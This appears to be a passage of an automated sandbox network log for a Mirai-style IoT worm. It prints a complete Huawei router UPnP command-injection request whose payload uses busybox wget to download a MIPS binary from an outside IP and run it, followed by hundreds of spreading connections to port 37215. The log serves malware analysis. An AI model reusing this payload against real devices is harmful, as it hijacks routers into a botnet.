                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2471192.168.2.135168241.88.229.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2472192.168.2.1337668197.35.139.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2473192.168.2.1340672197.151.61.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2474192.168.2.134180841.105.232.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2475192.168.2.1342932157.223.42.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2476192.168.2.135024641.99.21.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2477192.168.2.1348994197.225.248.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2478192.168.2.1341384157.92.61.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2479192.168.2.1348356197.37.137.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2480192.168.2.1350694135.187.166.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2481192.168.2.1356330197.176.4.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2482192.168.2.1333450197.107.134.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2483192.168.2.1340618157.222.171.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2484192.168.2.1359904157.63.145.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2485192.168.2.1340854122.60.129.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2486192.168.2.134329241.7.2.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2487192.168.2.1358814157.44.122.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2488192.168.2.1334404157.44.107.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2489192.168.2.135678841.48.133.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2490192.168.2.1349352197.73.10.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2491192.168.2.133359637.106.173.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2492192.168.2.1351724157.66.128.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2493192.168.2.1342162197.187.99.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2494192.168.2.1337830103.8.112.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2495192.168.2.135104841.124.191.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2496192.168.2.1348258197.144.200.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2497192.168.2.135509241.53.53.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2498192.168.2.133368654.237.175.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2499192.168.2.1345320157.183.103.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2500192.168.2.1356986197.110.155.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2501192.168.2.1353918197.9.128.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2502192.168.2.1332780157.88.135.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2503192.168.2.1346380197.120.146.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2504192.168.2.1335144197.95.88.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2505192.168.2.1352084197.212.140.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2506192.168.2.1345480197.52.176.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2507192.168.2.134207245.123.22.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2508192.168.2.133731441.89.29.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2509192.168.2.1345106159.190.168.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2510192.168.2.133990041.98.71.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2511192.168.2.1358988197.13.110.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2512192.168.2.1347544197.138.237.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2513192.168.2.135057241.151.164.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2514192.168.2.1343444197.185.69.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2515192.168.2.133439641.74.120.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2516192.168.2.135346441.83.224.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2517192.168.2.1333304157.223.246.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2518192.168.2.1359790157.135.64.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2519192.168.2.1334790148.0.68.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2520192.168.2.134928841.249.143.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2521192.168.2.1355262197.103.199.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2522192.168.2.133508292.6.89.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2523192.168.2.134339271.43.152.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2524192.168.2.133822041.141.189.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2525192.168.2.1334780164.202.139.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2526192.168.2.1358848114.120.167.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2527192.168.2.1347582157.206.235.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2528192.168.2.1341354197.136.190.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2529192.168.2.1350896197.92.202.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2530192.168.2.1346116118.22.239.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2531192.168.2.133992441.0.206.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2532192.168.2.1341606197.206.114.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2533192.168.2.1353846197.207.242.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2534192.168.2.134122241.111.110.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2535192.168.2.134758641.244.6.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2536192.168.2.1348572174.195.120.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2537192.168.2.134787241.113.113.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2538192.168.2.1340430197.53.214.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2539192.168.2.134114266.218.192.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2540192.168.2.1335372157.80.57.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2541192.168.2.133368241.247.113.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2542192.168.2.1350216197.211.243.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2543192.168.2.135785661.195.250.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2544192.168.2.1346544197.200.19.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2545192.168.2.1345356157.11.67.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2546192.168.2.133949241.124.67.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2547192.168.2.1350484202.228.183.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2548192.168.2.135601641.81.108.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2549192.168.2.134987241.248.125.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2550192.168.2.1344024197.50.60.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2551192.168.2.1358878157.69.161.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2552192.168.2.1340726197.195.214.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2553192.168.2.1344274197.227.161.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2554192.168.2.1340572157.138.44.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2555192.168.2.1355454197.62.246.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2556192.168.2.133611641.239.220.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2557192.168.2.1341328157.107.218.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2558192.168.2.1357976185.55.30.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2559192.168.2.1340258197.226.33.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2560192.168.2.1333948157.38.93.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2561192.168.2.134490841.253.177.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2562192.168.2.1358614168.234.115.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2563192.168.2.1342232157.249.134.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2564192.168.2.133506041.186.51.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2565192.168.2.1349328197.177.244.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2566192.168.2.1359434157.50.48.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2567192.168.2.135234041.96.151.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2568192.168.2.1357950168.134.235.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2569192.168.2.135585641.168.211.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2570192.168.2.1336012124.156.44.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2571192.168.2.1349002197.36.69.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2572192.168.2.1336984157.17.130.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2573192.168.2.133682871.249.185.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2574192.168.2.1360952132.242.137.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2575192.168.2.1358180157.200.136.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2576192.168.2.1357414157.28.161.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2577192.168.2.134083241.175.246.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2578192.168.2.1333324157.202.216.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2579192.168.2.135714844.33.169.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2580192.168.2.134190641.139.29.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2581192.168.2.134656441.100.160.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2582192.168.2.1358630218.113.176.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2583192.168.2.1343506197.172.31.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2584192.168.2.1355350114.221.24.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2585192.168.2.1333278152.98.175.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2586192.168.2.134636641.5.83.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2587192.168.2.135765041.5.230.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2588192.168.2.133392241.81.215.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2589192.168.2.1340318197.160.220.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2590192.168.2.1340528108.18.128.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2591192.168.2.1359582163.111.222.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2592192.168.2.135853441.206.124.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2593192.168.2.133939441.159.215.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2594192.168.2.134772041.79.28.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2595192.168.2.1346682157.4.135.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2596192.168.2.134611241.105.138.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2597192.168.2.1333160157.192.241.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2598192.168.2.133776641.6.16.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2599192.168.2.1336568149.155.130.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2600192.168.2.1357552157.116.246.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2601192.168.2.1356582170.224.100.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2602192.168.2.134072841.185.190.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2603192.168.2.133917441.110.238.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2604192.168.2.1354192197.2.130.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2605192.168.2.134199674.61.20.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2606192.168.2.1353654157.12.48.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2607192.168.2.135300841.197.35.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2608192.168.2.133589078.133.34.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2609192.168.2.1337072197.94.242.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2610192.168.2.1336758157.129.180.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2611192.168.2.134177641.8.221.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2612192.168.2.134700641.100.71.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2613192.168.2.133611441.152.122.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2614192.168.2.1335676197.153.79.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2615192.168.2.134759641.6.107.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2616192.168.2.1359858157.22.62.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2617192.168.2.1336110157.243.152.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2618192.168.2.135421641.44.217.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2619192.168.2.1342756157.87.142.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2620192.168.2.1349828197.248.107.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2621192.168.2.1344604157.187.155.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2622192.168.2.135510441.133.254.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2623192.168.2.1360118197.122.19.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2624192.168.2.133792641.102.120.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2625192.168.2.1346790197.186.43.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2626192.168.2.1353588197.39.189.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2627192.168.2.1349600197.137.115.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2628192.168.2.1349366108.57.147.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2629192.168.2.134450841.243.45.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2630192.168.2.1347010157.28.47.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2631192.168.2.135785453.13.196.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2632192.168.2.1354136157.230.199.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2633192.168.2.135179441.25.29.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2634192.168.2.136064441.193.171.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2635192.168.2.1335786193.211.205.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2636192.168.2.1353918112.216.28.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2637192.168.2.1353520197.254.156.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2638192.168.2.134349441.48.40.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2639192.168.2.134165641.94.26.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2640192.168.2.1345928157.245.251.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2641192.168.2.136016836.72.205.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2642192.168.2.1345066197.132.244.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2643192.168.2.1359484124.169.103.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2644192.168.2.133575841.232.113.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2645192.168.2.133388279.125.146.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2646192.168.2.134155096.186.23.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2647192.168.2.134380641.228.200.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2648192.168.2.1350924197.205.113.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2649192.168.2.1337428157.223.58.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2650192.168.2.1346310197.85.176.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2651192.168.2.1339852197.66.240.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2652192.168.2.136045241.38.165.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2653192.168.2.1351468157.79.153.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2654192.168.2.1337376157.72.88.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2655192.168.2.1341576157.20.235.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2656192.168.2.1351268194.102.179.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2657192.168.2.1355572124.11.125.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2658192.168.2.134193441.145.155.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2659192.168.2.1338066197.167.59.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2660192.168.2.1335692197.188.92.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2661192.168.2.1342874157.194.39.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2662192.168.2.133383637.85.123.8237215
